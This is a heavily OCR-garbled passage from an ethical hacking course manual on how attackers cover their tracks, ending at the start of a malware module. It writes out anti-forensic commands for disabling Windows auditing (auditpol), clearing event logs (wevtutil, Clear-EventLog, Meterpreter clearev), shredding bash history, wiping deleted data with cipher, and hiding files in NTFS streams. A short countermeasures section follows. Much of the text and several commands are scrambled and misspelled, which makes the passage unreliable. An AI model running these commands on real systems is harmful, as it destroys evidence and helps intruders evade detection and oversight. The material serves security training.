messages generatedi n the attack process.The attacker makeschanges to the system
configuration suchthat it doesnot logthe futureactivities. Bymanipulating
andtweaking event
logs,the attackertricksthe systemadministrator into believingthat thereis no malicious
activityi n the system
andthat no intrusion or compromise hastakenplace.
Becausethe first thing a syste administrator
doeswhenmonitoring unusualactivityis check
the system to usea tool to modify
logfiles,itis common forintruders theselogs.
In some cases,
rootkitscan disableanddiscardall existinglogs.Attackersremove onlythoseportions of logs
that can revealtheirpresenceif theyintendto use the systemfor a longperiod as a launch
basefor future exploitations.
Attackersmust makethe system appear as it did beforeaccess was gainedanda backdoorwas.
established.Thisallowsthemto change any file attributesbackto theiroriginal state. The
informationlisted,
suchas file size anddate, is justattributeinformation
containedi n thefile.
Protection attackerstryingto cover their tracksbychanging
against file informationcan be
difficult. However,
it is possible
to detectwhetheran attackerhasdoneso bycalculating the
file'scryptographic
of
hash.Thistypeof hashis a calculation the entire file beforeencryption.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Attackers
maynot wishto delete an entire logto cover their tracks,
as doing s o mayrequire
adminprivileges.
detection, only
If attackerscan delete attackevent logs, theywill stil be ableto escape

attacker
The
=
thelogins,
can manipulatelogfileswiththe help

accessing
(security):
SECEVENT.EVT failed
of
fileswithout privileges
‘=
things
(system):
SYSEVENT.EVT driverfailure, not correctly
operating
APPEVENT.EVT
‘*

Techniques
(applications)
UsedforCovering
Tracks
towardremovinghis/her
Themain activities that an attackerperforms traces on a computer
are as follows:

*
Disabling
Auditing: An attacker
disables features
auditing ofthetargetsystem.
Clearing Logs: An attackerclears/deletes
the systemlogentries corresponding to
his/her
activities
Manipulating manipulates
An attacker
Logs: logsi n sucha way that he/she
will not be
caughtin legal
action.
Covering on the Network: An attackeruses techniques
Tracks suchas reverse HTTP
shells,
reverse ICMPtunnels,
network
ONS andTCPparameters
tunneling, to cover tracks the
on
Covering Trackson the OS:An attackeruses NTFSstreamsto hideandcover malicious
filesinthe targetsystem,
Deleting
Files:An attackeruses a tool suchas Cipher.exe
command-line to deletethe

Disabling Windows
of
dataandpreventrecovery that datai n future.
Functionality:
An attackerdisables Windows functionalitysuchas
lastaccess timestamp, hibernation,virtual memory, system
restore points,
etc. to cover
tracks.
Thus,the complete jobof an attackerinvolvesnot onlycompromising the systemsuccessfully,
but alsodisabling
logging, logfiles,eliminating
clearing planting
evidence, additionaltools,
and
coveringhis/her
tracks.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Disabling
Auditing:
Auditpol

ate gaining
immediately

Disabling
Auditing:
Auditpol
Source:https://docs.microsoft.com
One of the first stepsfor an attackerwho hascommand-line capability
is to determinethe
auditingstatus of the targetsystem,locatesensitive files(suchas password files),
andimplant
automatic information-gatheringtools(suchas a keystroke logger
or networksniffer).

Windowsrecordscertain events to the event log(orassociated syslog).

The logcan be set to
SMS,
sendalerts(email, etc.)to the syste administrator.Therefore,the attackerwill want to
knowthe auditing
status of the system he/she to compromise beforeproceeding
is trying with

his/her
plans.
Auditpol.exe utilitytool to change
is the command-line audit security
settingsat the category
andsub-category levels.Attackerscan use AuditPolto enable or disable auditing
security on
localor remote systems, and to adjustthe audit criteria for different categories
of security
events.
Themoment intruders privileges;
gain administrative theydisableauditing
with the helpof
auditpol.exe.
Oncetheycomplete
their mission, theyagain turn on auditing
using the same
tool.
Aftergainingaccess and establishing
shellaccess with the targetsystem,
attackersuse the
following
commands to enable/disable
system auditinglogs:
Enabling auditing:
system
C:\>auditpol/set /category:"system―,―account
logon―/success:enable
/failure:enable

ical andCountermensores
Mackin ©by E-Comel
Copyright
Disabling auditing
system
logon―/success:disable
€:\zauditpol/set /category:―system―,―account
/failure: disable
Thiswill makechangesi n the various logs
chooseto hidethe registry keyschanged
that might
lateron. the
registerattacker'sactions.He/she
can

Attackerscan use AuditPolto view definedauditing settings

on the targetcomputer,running
the
following command at thecommand
auditpol /get /category:*
prompt:

of
Screenshots the outputbyAuditpol are as follows:

showing
the
output
Screenshot
Figure 6.149: ofAull sablingaut

showing
6.150Sereenshot
Figure theoutputof Audtpol audit
enabling

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Clearing
Logs CEH

Clearing
Logs(Cont'd)

T oclearthe enies fromthe

PowerShell
evant
from

alllogs
T oclear
thesystems
on species and then

Clearing
Logs
Clear_Event_Viewer_Logs.bat is a utilitythat can be usedto wipe out the logs of the target
system. Thisutility
c an be run through commandprompt,Powershell, and usinga BATfile to
deletesecurity,
system, and application logs.Attackers mightu se this utilityto wipe out the
logsas one methodof covering theirtrackson the targetsystem,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 to clearlogs
Steps usingClear_Event_Viewer_Logs.bat
utilityare as follows.
1. Downloadthe Clear_Event_Viewer_Logs.bat
utilityfrom
https://www.tenforums.com.
Unblock
the
.bat
file
or pressandholdon the .batfile andclick/tap
Right-click on Runas administrator.

byUAC,click/tap
If prompted on Yes.
commandpromptwill now open to clearthe event logs.
‘A Thecommandprompt
will
automatically
closewhenfinished,

Steps
Figure
6.151:
of logs
to clearlogs
using
Clear
Logs
bat
Screenshot
clearing
using
Meterpreter
the EventViewer
shellare as follows.
fle

If the systemexploited
is
out all the logs shell
with Metasploit,
froma Windowssystem:
the attacker uses a Meterpreterto wipe

1. Launchthe meterpretershell promptfromthe Metasploit Framework.

2. Type clearev commandi n the Meterpreter shellpromptandpressEnter. The logs
of the targetsystem will start being
wiped out.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 6.152:
Figure Screenshot
ofMeteroreter
Steps logsusing
to clearPowerShell commanda re as follows.
Clear-EventLog
Source:https://docs.microsoft.com
Using
logs
the Clear-EventLog command,
fromlocalor remote computers:
the attackercan
clear
all the PowerShell
event

1. LaunchWindowsPowerShellwithadministratorprivileges,
2. Use the following commandto clearthe entries fromthe PowerShell
event logon
the localor remote system:
>Clear-EventLog
“Windows
PowerShell"

Use
the
following
systems:
to clearspecific
command multiple
log
types
fromlocalor remote

>Clear-EventLog -LogName ODiag, OSession -ComputexName

localhost, Server02
(Thiscommandclearsall the logentries i n MicrosoftOfficeDiagnostics
(ODiag)and
MicrosoftOfficeSessions(OSession) on the localcomputer andServer02remote
computer.)
Use the following commandto clearall the logs
o n the specified andthen
systems,
displaythe event loglst
>Clear-EventLog application, system -confirm
~LogName

ical andCountermensores
Mackin ©by E-Comel
Copyright
 usedin theCLear-BventZogcommand
Note:Theparameters are as follows:

~ComputexNane:Specifies
a remote computer;thedefaultis thelocalcomputer
»
you for confirmation
~Confizm: Prompts beforerunningemdlet
~LogNane: Specifies
the event logs
whatwill happen
-WhatT£:Shows if theemdletr uns
‘=
Steps using
to clearevent logs wevtutil utilityare as follows.
1. Launchcommand withadministrator
prompt privileges.
2. Usethefollowing
commandto display
a list ofevent logs:
>wevtutil el
3. Usethe
following
>wevtutil
command
cl
clear
event
logs:
<log_nane>
to the

name ofthe log

‘Log_name: to clear, application,
ex: system, security
shownin the screenshot,
‘As the attackercan view the list of event logsusingthe
utilityandclearthe system,
‘wevtutil application,
andsecurityevent logs.

Figureelearng
logs
sing
wevtuti of
6.153-Sereenshot the tity

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Manually Event Logs
Clearing

Manually Event Logs

Clearing
Onceattackersgain administrativeaccess to a theycan manually
targetsystem, wipe out the
logentries corresponding
to theiractivities on bothWindowsand Linux computers.
Thesteps
to clearevent logs
o n Windows
andLinuxOSsa re as follows:

ical
Mackin
and ©by
CountermensoresCopyright
E-Comel
ForWindows
‘=
Navigateto Start > ControlPanel> System > AdministrativeTools>
and Security
double-clickEvent Viewer
=
Deletetheallthe logentries logged thesystem
whilecompromising

Ceol
Gh Gvviewer

To
ThEse viewerdeco)

opion Dintrma_ 622019

104.0
48 Open
Saveog.
80a
perenne edSeetev

Frchon DDS TokeDO

The
aareengne
nan―
|an EH

Clearing
Figure6154: forWindows
event logs

ical andCountermensores
Mackin ©by E-Comel
Copyright
ForLinux
=
to the/var/log
Navigate directory
on theLinuxsystem
=
Open
the plaintext logmessageswith text editor/var/log/messages
file containing
+

Delete
all entries
thelog loggedwhile compromising
the system

|
Open ~

May2 3 03:11:18 kali mtp-probe:

'pe10000:00/0000:00:
checking
messages
b us 2, device 2 : -/sys/devices/
11.0/0000:02:00.0/usb2/2-1
May2 3 03:11:18 kali atp-probe: bus: 2, device: 2 was not an M T Pdevice
May2 3 03:11:18 kali rsystogd:imuxsock: Acquired UNIX socket.
Syslog’(7d 3) from systend.[v8.40.0]
yy 23 03:11:18 kali rsystogd: [origin software=*rsyslogd*
con") start
"/run/systend/
journal/
swersion="@.40.0" x.
Osr11:18 kali kernel: { 0.000000] Linux version 4.19.0-kali3-andos

fim
3'03:11:18 kali kernel: { 0.000000}Connand Line: BO0T_IHAGE=/boot
inuz=4.19,0-kali3-and64 root=/dey tall/gtk/initrd.gz quiet
Pay 23-02:11;18 kali kernel: [ string operations
hay 2 3 03:11:18 kali kernel [porting XSAVEfeature exoo1
x87 floating point registers’
May2 3 03:11:18 kali kernel c
[porting XSAVEfeature 0002:
SSE registers:
3 723 03:11:18 kali Kernel porting XSAVEfeature 0x004:
ay 2 3 03:11:18 kali kernel: ( tate offset{2l: 576,

All
xstate sizes(2]: 256
Select
May2 3 03:11:18 kali kernel: [ labledxstate features 0x7
Context size is 832 bytes, using Pot
May2 3 03:11:18 kali kernel: [ l e d physical Rammap:
Hay23 03:11:18 kali kernel: [02 Change »
linen
'x0000000000000000-0x000000000009ebir1usaDie
May 2 3 03:11:18 kali kernel: [0.000000] B10S-e820: [nen
1x000000000009ec00-Oxs000000000091FFT] reserved

Figure
6.55: Clearing
eventlogs
for Linux

Module
6 811
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
 to Clear Online Tracks
Ways
©Remove
‘and
theMostRecently
cleatheToolbar
Used(MRU),deletecookies,
datafrm thebrowsers
clear
the turnoff Autocomplete,
cache,

Fromthe Privacy inWindows10 @-4®

Settings Fromthe Registry
inWindows10,

Settingsand ck on “Personalization― REY LOCAL_MACHINE\SOFTWARE\

1 In
Explorer
remove
clickStarfromtheleft
Personalization,
Micosof\Windows\Currentversion\
andthen the key

pps" and Show

recently
opened itemsin

i oo

to ClearOnline Tracks
Ways
Attackerscan clearonlinetracksmaintainedusing web history,
logs,
cookies,
cache,
downloads,
visited
time, etc. on thetargetcomputer
theattackershaveperformed, so
that
the
victims
cannot
what
notice onlineactivities

‘What
can attackersdo to cleartheir onlinetracks?

Use privatebrowsing *
Cleardatai n the password
manager

*
address user
Delete history

Disable
in the field
storedhistory
*

=
Deletesavedsessions
Delete JavaScript
Deleteprivatedata Setup multiple
users

cookies
Clear
Clearcacheo n
on exit
exit
Remove Most Recently
Used(MU)
Cleartoolbardatafrom browsers
Delete

=
Turn
off
AutoComplete
Disablepassword
downloads
manager
attackersshouldfollow different pathsfor
To clearthe online tracksof various activities,
different
OSs.
The stepsto clearonline tracksfromthe Privacy or fromthe Windows
Settings registry
(Windows10)are as follows:
‘=
Fromthe Privacy
Settings
in Windows
10
©. Right-click
on theStartbutton, andclickon Personalization
chooseSettings,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 clickStartfromthe left paneandturn offboth“Show
In Personalization, most used
apps―
and"Showrecently
opened
items in Jump
Listson Startor the taskbar―
+
From the Registry
in Windows10
© theRegistry
Open Editorandnavigate
to
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentV
andthenremove thekey for "RecentDocs―
Deleteall thevaluesexcept“(Default)―

ical andCountermensores
Mackin ©by E-Comel
Copyright
 BASHShellTracks
Covering
BASH
isan
(@T h e

1 can
You
theshell
hat ina
saved
History
ew called
s-compatible

command command
sores
ung
command
he
fe
history
Bash
istry
more“/.bash_Nstory

boner - (nah
ted
sor

BASHShellTracks
Covering
BourneAgainShell,
or Bash,is an sh-compatible
shellthat stores commandhistory
i n a file
calledthe bashhistory.
You can view the saved commandhistoryusing the more
~/.bash_historycommand
featureof Bashis a problem
‘This for hackers, coulduse the bash_history
as investigators file to
trackthe origin of an attackandthe exact commands usedbyan intruderto compromise a
system.
usethe following
Attackers commands
to clearthesaved history
command tracks:
=
Disabling
history
export HISTSIZ
Thiscommanddisables the Bashshell fromsavinghistory. HISTSIZEdetermines
the
numberof commands to be saved, this command,
which is set to 0. After executing
attackerslosetheirprivilege
to review thepreviously usedcommands.
Clearing
the history
© history ~

Thiscommandi s usefulin clearing thestoredhistory.

Itis an effective
alternativeto
disabling
the historycommand a s,i n thiscommand,
a n attackerhasthe convenience
of rewriting
or reviewingtheearlier usedcommands.
history ~

Thiscommand onlydeletesthe history of thecurrent shell,

whereas
thecommand
history
of othershellsremains unaffected

ical andCountermensores
Mackin ©by E-Comel
Copyright
Clearing complete
theuser’s history
cat /dev/null >history && history -c 66 exit
~.bash

Thiscommanddeletesthe complete
andexitsthe shell.
command
of
historythe current andallothershells

Shredding thehistory
shred ~/.bash_history
This command shredsthe history file and rendersits contents unreadable.
It is
usefulwhenan investigatorlocatesthe file,but owing to this command,
becomes

shred
to file. .bash
tunable readanycontent in thehistory
~/.bash_historyés history
cat /dev/null > &&
history -¢ 66 exit

file,then deletesthe file,andfinally

This command firstshredsthe history clearsall
theevidenceof its usage,

parrot
texport HISTSIZE=0

bournF E400
ab
468-206

Figure
6.15: Covering
Bashselltacks

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Trackson a Network
Covering

a (a Te tac install reverseHTTP

selon thevin’
machin,which programmed
i such a

iran oflke yan

‘tacir

consiered
normal
oranzton's
network
perimeter
behaves a webserver
Thstipe trate
andresponds
a
tothe requests.
tac acuity

Using
Reverse
ICMP
‘Tannels
‘Tne
TCP
vii’ syste to capt
triggered the payoudin anCMP
echo phe hats

TEMP
packets,
can
ealthe therefore
tale bypass rewall

Covering
Tracks on a Network (Cont'd)

use tacks can ONS to encode

tunneling malicious
contentor dataofotherprograms

Bans
| ons
Using
creates
D NS
DNS
canbck efitrate
use stolen
tuneing
(2 stacker make ofthisback
information
framthe server
channel
to aces2

channelto
remoteserver andappatons
confidentialor sensi

“TCP canbe used

parameters bytheattacker
to distribute and
thepayload

|
SattaaeComments EE)

Covering
Tracks on a Network
=
Using HTTPShells
Reverse
attackerstarts this attackbyfirst infecting
‘An a victim'smachinewith malicious code,
andthereby installing a reverse HTTPshellon the victim’s
system. Thisreverse HTTP
shell is programmed in such@way that it asksfor commands to an externalmaster,
which controlsthe reverse HTTP shell on a regular basis.This type of traffic is

ical andCountermensores
Mackin ©by E-Comel
Copyright
 normalbyan organization's
considered networkperimeter controlslikeDMZ,
security
firewall,
etc.
Once a n attackertypessomethingon the master system,the commandis retrievedand
executedon thevictim’s
system.Thevictim hereacts as a webclientwho executesthe
HTTPGETcommands,
the requests.
next web request.
whereasthe attackerbehaveslike a web server and responds
Oncethe previouscommands are executed, the resultsare sent in the to
can normally
All theotherusers i n the network accessthe Internet; thetraffic
therefore,
betweentheattackerandthe victim is seenas normal,
Using Reverse ICMPTunnels,
Internet ControlMessage Protocol(ICMP) tunneling is a techniquei n whichan attacker
uses ICMPechoand reply packets as carriers of TCPpayload, to stealthilyaccessor
controla system.Thismethodcan be usedto easily bypass firewallrules,becausemost
organizations
‘outgoing
ones.
have
security
mechanisms that onlycheckincomingICMPpackets but not

attackerfirstconfigures
‘An the localclient to connect with the victim.Thevictim's
systemis triggeredto encapsulate a TCPpayload in an ICMPecho packet, whichis
forwardedto the proxyserver. The proxyserver de-encapsulates and extracts the TCP
payload,
Using
andthen
DNSTunneling.
sends
it to the attacker.

Attackerscan use DNStunnelingto encodemaliciouscontent or dataof other programs

withinDNSqueriesandreplies. DNS tunnelingusually
includes datapayload that can be
addedto the victim’s
DNSserver to create a backchannel
to access a remote server and
applications.
Attackerscan employ to exfiltrate stolen,
this backchannel confidential,or sensitive
informationfromthe server.
perform
Attackers DNStunneling first,theycompromisea n internal
i n various stages;
systemto create a connection with an external network. Then,theyuse that
compromisedsystemas a command
andtransferfilescovertly
andcontrolserver remotely
fromwithinto outsidethe network. to
accessthe system

Using
TCPParameters
TCP parameters can be used bythe attackerto distributethe payload
and to create
covert channels.
Someof theTCPfieldswheredatacan behiddenare as follows:
© IP IdentificationField:Thisis an easy approach
i n whicha payload
is transferred
bitwiseover an established
session between In this approach,
two systems. one
characteri s encapsulated
perpacket.

ical andCountermensores
Mackin ©by E-Comel
Copyright
TCPAcknowledgement Number:Thisapproach is quitedifficulta s it usesa bounce
server that receives packetsfromthe victim andsendsit to an attacker.Here, one
hiddencharacter is relayed
bythebounceserver per packet
TCPInitial Sequence Number:Thismethodalsodoes not require an established
connection betweenthe two systems. Here,one hiddencharacteris encapsulated
perSYNrequestandreset packet,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Covering
Tracks on an OS CEH
‘Windows NK

Tracks on an OS
Covering
=
Windows
NTFShasa featurecalledADSthat allowsattackersto hidea file behindother normal

tofiles
files.Steps hide a re as follows:
usingNTFS
©

©
Open promptwith an elevatedprivilege
the command
Typethecommand“type
C:\SecretFile. txt

(here, C
>C: \LegitFile. txt
wherethe SecretFile.txt
:SecretFile. txt― thefileis kept the drive
file is hiddeninsidethe Legitfile.txt
file)
To view
the
hidden txt"
file,type“more
knowthehiddenfile name)
< C:\SecretFile. (forthis you needto

Hidden
Content

6157: Covering
Figure tracks
on Windows
0S

ical andCountermensores
Mackin ©by E-Comel
Copyright
UNIX
Filesin UNIXcan be hiddenjust byappendinga dot (.)in front of a file name. In UNIX,
each directoryis subdividedinto two directories:current directory (,) and parent

files a/tmp,
directory(..).
hiddenusually
/dev,
are
and a .
Attackersgive these similarname like
placed
in /etc.
(with spaceafter ).These
“, "

‘An log
attacker
can alsoeditthe filesto cover theirtracks.However,
sometimes,
using
this technique
of hidingfiles,a n attackercan leavehis/hertrace behindbecausethe
‘command
a
he/she
he/she
.bash_history
usedto open file will be recorded
attackerknowshow to overcome sucha problem;
command,
in a file.A smart
doesso byusingthe export

Figure6.158:
Covering
tracks
onUNKKOS

ical andCountermensores
Mackin ©by E-Comel
Copyright
 1
DeleteFilesusing Cipher.exe CEH
|@opherese
can but
Windowssecurely
delete
data
by
commande too tht can beused
to overwriting

DeleteFiles using
Cipher.exe
Cipher.exe is a n in-builtWindowscommand-line tool that can be usedto securely deletedata
byoverwriting themto avoidrecoveryi n thefuture.Thiscommand alsoassistsi n encrypting
anddecrypting datain NTFSpartitions
Whena n attackercreates and encrypts a malicioustext file,at the time of the encryption
process, a backup fileis created.Therefore, ifthe encryption processi s interrupted, thebackup
file can beusedto recover the data.After the completion of the encryption process,the backup
fileis deleted, butthisdeletedfilecan berecoveredusingdatarecoverysoftware andcan then
beusedbysecurity personnel for investigation.
To avoiddata recovery and cover their tracks, attackersuse the Cipher.exe tool to overwrite
thedeletedfiles, firstwith all zeroes (0x 00),secondwith all 255s(0x FF}, andthen finally with
randomnumbers.
attackerc an deletefilesusingCipher.exe
‘The byimplementing
the following
steps:
=
Launch command privileges
promptwith administrator
Use

following
command
the
overwrite
deleted
specific
folder:
to
cipher /w:<drive letter>:\<folder
filesin a
name>

Use
following
command
the
overwrite
alldeleted to
cipher /w:<drive letter>
the filesin the givendrive:

ical andCountermensores
Mackin ©by E-Comel
Copyright
 6.159:
Figure Screenshot
ofCipher
exe command

ical andCountermensores
Mackin ©by E-Comel
Copyright
 DisableWindowsFunctionality

fous
DisabletheLast
a uty in
AccossTimestamp

Disable
Windows
DisableWindows
hibernation
Hibernation

wing theRegistry
itor or c ommand
powereg

Disable Windows Functionality

(Cont'd)
Disable
Windows
Virtual Memory(PagingFile) Disable Restore
System
P
e

10
[windows

Modul
6 £22
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
 1
DisableWindowsFunctionality
(Cont'd) CEH

DisableWindowsFunctionality
Timestamp
Disablethe LastAccess
Thelast access timestamp of a file contains informationregarding the time and data
whenthe specific filewas opened for reading or writing,Therefore,
everytime a user
accesses a file,the timestamp is updated. Attackersuse the fsutil tool to disableor
the
alast
enable access
timestamp.
utilityin theWindowsOSusedto set theNTFSvolumebehavior
foutil is command-line
parameter, DisableLastAccess, whichcontrolsthe enabling
or disabling
of the last
accesstimestamp

For example,
DisableLastAccess =
1 indicates
that the lastaccess
are
timestampsdisabled.
=
DisableLastaccess
shownin the screenshot,
‘As
0 indicates
that thelastaccesstimestamps
attackersuse the following
are enabled.
commandto disablethe last
access updates:
>fsutil behavior set disablelastaccess 1

ical andCountermensores
Mackin ©by E-Comel
Copyright
 BE
Administrator Prompt
Command

6160; Screenshoto ft
Figure command

Disable
Windows
Hibernation
The hibernatefile (Hiberfil.sys)
is a hiddensystem file locatedin the root directory
wherethe OS is installed.Thisfile contains informationregarding the systemRAM
stored on a hard disk at specific
times (when the user selectsto hibernatehis/her
system).Thisinformationis crucialas security personnel can use it to investigate
an
attackon thesystem. Therefore,
disabling Windowshibernation is a crucialsteptoward
coveringthetracks.

can
Theattacker disableWindows
following
steps:
hibernation through
the the
registry byimplementing

© OpenRegistry to the following

Editorandnavigate location:

Computer \HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\P

from the rightpane;

Double-clicko n HibernateEnabled an (32-bit)
Edit DWORD
Valuedialog
boxappears
In theValuedata:field,enter a valueof 0 to disablehibernation
© PressOK

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Figure 6.16:Screenshot
of Registry
Editorto disable
hibernation

Attackers can also disableWindowshibernation

throughcommandpromptby

©
the
implementing
following
steps:
with administratorprivileges
Launchcommandprompt
©
Use
following
command
the
powercfg.exe/hibernate
to disablehibernation:
off
Disable
Windows (Paging
VirtualMemory File)
Virtual memory,alsocalleda pagingfile,is a special file in Windowsthat is usedas a
compensation whenRAM (physical memory) fallsshortof usablespace.For example, if
an attackerhasan encrypted fileandwants to readit, he/she must firstdecrypt it. This
decrypted file staysi n the pagingfile,even after the attackerlogs out of the system.
Moreover, some third-party programscan be usedto store plaintext passwords and
other sensitive informationtemporarily. Therefore,disabling paging i n Windowsis a

step
covering
tracks.
crucial toward
Theattackerc an disablepagingbyimplementing
the following
steps:
1. Open to the following
ControlPanelandnavigate location:
System Security
and > System
> Advanced systemsettings
System
‘A dialog
Properties box appears;i n the Advanced
tab,clickon Settings.
underthe Performance
section
Options
A Performance dialog
box appears; go to the Advancedtab andclickon
Change...
the Memory
under Virtual section

ical andCountermensores
Mackin ©by E-Comel
Copyright
 A VirtualMemory dialog Automatically
boxappears;uncheck managepagingfile
size for all drives

Selectthe drivewherepagingshouldbe disabled,

thencheckthe optionNo paging
file andclickSet
In the System
Properties
window,
clickYes
Finally, the changes
clickOKto implement

of asabiing
6.162:Screenshot
Figure throughControlPanel
paging
DisableSystem
Restore Points

System abouthiddendata andpreviously

restore pointscontain information deleted
files.Thisposesa
restore points. risk
for attackersas the deletedfilescan berecoveredfromprevious

Theattackerc an disablesystemrestore pointsbyimplementing thefollowing

steps:
© Open to the following
ControlPanelandnavigate location:
System
andSecurity > System
> System protection
ical andCountermensores
Mackin ©by E-Comel
Copyright
 System
‘A dialog
Properties Protectiontab,selectthe
box appears;i n the System
driveandclickon Configure...
Underthe Restore Settings
section, selectthe Disablesystem optionand
protection
clickon theDeletebutton
TheSystemProtectionwizardappears; clickContinueto deleteall restore pointson
the drive

Click OK
Repeat
theabovestepsfor all diskpartitions

1 Windows 10

Figure6163: of asabing
Screensht restore pointsthrough
Contral
Panel
DisableWindowsThumbnailCache

DOCK, a file
thatthumbnails
thumbs.dbis Windows
types
stores
filessuchas GIF,JPEG,
and graphic
informationregarding
PNG,
ofdocument suchas PPTXand
andTIFF.Thisthumbnailfile contains
filesthat were previously
deletedor usedon the system.
For example, if an attackerhasusedan imagefile to hide a malicious file and later
deletedit, a thumbnailof this image is storedinsidethe thumbs.dbfile,whichreveals
thatthedeletedfilewas previously usedon thesystem.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Theattackercan disablethethumbnailcachebyimplementing
the following
steps:
Windows+ Rkeys
Press to opentheRundialog
box
©
Type
gpedit.mse
andpressEnteror clickOK
The LocalGroup Editorwindowappears;navigate
Policy >
to User Configuration
Templates
‘Administrative > WindowsComponents > FileExplorer
© o n the Turnoff the caching
Double-click of thumbnailsin hiddenthumbs.dbfiles
settingfromtheright pane
© SelectEnabledto turn offthethumbnailcache
©
Click
OK

6.164:
Figure Screenshot
ofcsabling
DisableWindowsPrefetchFeature
t he thumbnalcache
Policy
in LoealGroup Ealtor

Prefetch dataaboutthe applications

is a Windowsfeaturethat stores specific that are
typically
used by the systemusers. The stored data helpi n enhancing system
performance
the
byreducing time required to loador start applications.

ical andCountermensores
Mackin ©by E-Comel
Copyright
For
example,
application
copy of that
usedbysecurity
has
ifan attacker installeda maliciousapplication andthenuninstalled it, a
will be storedi n the Prefetchfile. ThesePrefetchfiles can be
to recover deletedfilesduring
personnel theinvestigation
of a security
incident.
‘Attackers
© Press + Rkeys
Windows
featurebyimplementing
can disablethe Prefetch

to openthe Rundialog
box,
following
steps:
the
‘Type
services.mseandpressEnteror clickOK
Searchfor the Superfetch i t to open Superfetch
service anddouble-click Properties
(Local
Computer)
Fromthedrop-down type,selecttheDisabled
optionsi n Startup option

Click
OK

aaa
Seve caTe a

assc.
Meals groves te
4 cone

| |
ling RecoverOmndncs

aD ee

Screenshot
of disabling
theSuperetch
service

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Tools
Track-Covering

in
lois
ie

Tools
Track-Covering
Track-covering tools helpthe attackerto cleanup all the tracksof computerand Internet
activities on the targetcomputer.Track-covering toolsfreecachespace,deletecookies,
clear
Internethistory andsharedtemporary files,deletelogs,anddiscardjunk.
CCleaner
Source:https://www.ccleaner.com
CCleaner is @systemoptimization,privacy,andcleaning tool. It allowsattackersto
remove unusedfilesandcleanstraces of Internet browsing
detailsfromthe targetPC.
Withthistool,a n attacker tracks.
erase his/her
can veryeasily

ical andCountermensores
Mackin ©by E-Comel
Copyright
 tat
© oman.
90
a)

Figure6.16;
Srensho ofCleaner
Someexamples
of track-covering
toolsare listedas follows:
+
DBAN(https://dban.org)
+
Eraser(hteps://www.cybertronsoft.com)
Privacy
Wipe (https://privacyroot.com)
(https://www.bleachbit.org)
Bleachsit
(http://www.clearprog.de)
ClearProg

Modul
6 £22
Page ical
and ©
Mackin Countermensores
Copyright
by E-Comel
 Defending Tracks
againstCovering

Ato nto
I erat amen
corte
sens
onfeweappopiteandminimal
deletion
og
Seogesto “append
only―
permisons m ee o prevent
necessaryoread andwrt fee Uinauthorsed of entries

Defending
against Tracks
Covering
Thevarious countermeasuresagainst
covering tracksare listedas follows:
Activate logging
functionality
on all criticalsystems

Conduct a periodic
auditon IT systems
policy
with the security
to ensure
logging
functionality is i n accordance

Ensurenew events do not overwrite old entries i n the logfileswhenthe storage limit is
exceeded
Configureappropriateandminimalpermissions necessary to readandwrite logfiles
storedon criticalsystems
logging
Maintaina separate
so
server on the DMZ,that all thecriticalservers, suchas
the DNSserver,mailserver,webserver, etc.,forwardandstore their logso n that server

Regularly
update patch
and OSs, applications,andfirmware
Closeall unusedopen portsandservices
Encryptthelogfilesstoredon thesystem,
so thataltering
themis not possible
without
anappropriate decryptionkey
Set log
filesto “append
only― deletionof logentries
modeto preventunauthorized
Periodically
backup thelogfilesto unalterable
media

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Module Summary

‘nous andtoo attachesemploy

techniques to gan
aces
tothe tart sytem

Module Summary
In this module, in detailthe CEHhacking
we discussed methodologyalong with the various
phases involvedin systemhacking,
suchas gaining access, escalating
privileges,
maintaining
access,andcoveringtracks. We alsodiscussedthe differenttechniques andtools attackers
employ to gain access to a targetsystem.Thismodulealso discussed various tools and
techniques attackers theirprivileges.
use to escalate It explainedvarious techniques,suchas.
the execution of maliciousapplications
(keyloggers,
spyware, rootkits,ete.),NTFSstream
manipulation, and steganalysis,
steganography, whichattackers
use to maintain remoteaccess
to a targetsystemand stealcriticalinformation.It alsoelaboratedon the various techniques
usedbyattackersto erase all evidenceof compromisefrom a target system. Furthermore,
the
various countermeasuresthat shouldbe employed systemhacking
to prevent attempts,along
tools,
with various softwareprotection were discussed

In thenext module,
we will discuss
in detailthevarious malware
threats.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 |
Certified Ethical Hacker

Module07:
MalwareThreats
 Module Objectives

Advanced
Understanding PersistentThreats(APTS)
andthe Ufecyce

‘overview
of Trojans,
Thee
Types,and HowtheyinfectSystems

of
‘overview
Vewes,
TherTypes,

of Computer
‘overview
andHow
They
infecles

WormsandFieess Malware

the MalwareAnalysis
Understanding Process

Understanding
Difrent Malware
Countermeasures

Module Objectives
The primary objectivesof this moduleare to provide
knowledge
aboutvarious typesof
malwareand to illustratehow to performmalwareanalysis.
Thismodulepresentsdifferent
typesof Trojans, backdoors,viruses, andworms, explains howtheyworkandpropagate or
spread o n the Internet,
describes their symptoms,anddiscusses their consequencesalong with
various malwareanalysis techniques suchas static anddynamic malwareanalysis. It also
discusses differentwaysto protectnetworksor system resources frommalwareinfection,

At theendof this
Describe
module,
willable
to:
you
the concepts
be
techniques
of malware andmalwarepropagation
=
theconcepts
Describe ofadvanced threats(APTS)
persistent andtheir lifecycle
=
Describe of Trojans,
the concepts andhow theyinfectsystems
their types,
Explain of viruses,
the concepts their types,andhowtheyinfectfiles
Explain
the
Explain
concept
of computer worms

of filelessmalwareandhowtheyinfectfiles
the concepts
Perform
malwareanalysis
Explain
differenttechniques
to detectmalware
Adopt
countermeasuresagainstmalware

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

Marre concen sess Matar

Concept
e MalwareAnalysis

©Fetanconcepts Ceuntroeatsres

e Virus and
Worm
Concepts Anti-MalwareSoftware

Malware Concepts
To understandthe various typesof malwareand their impacto n networkand system
resources, we will begin
with a discussion
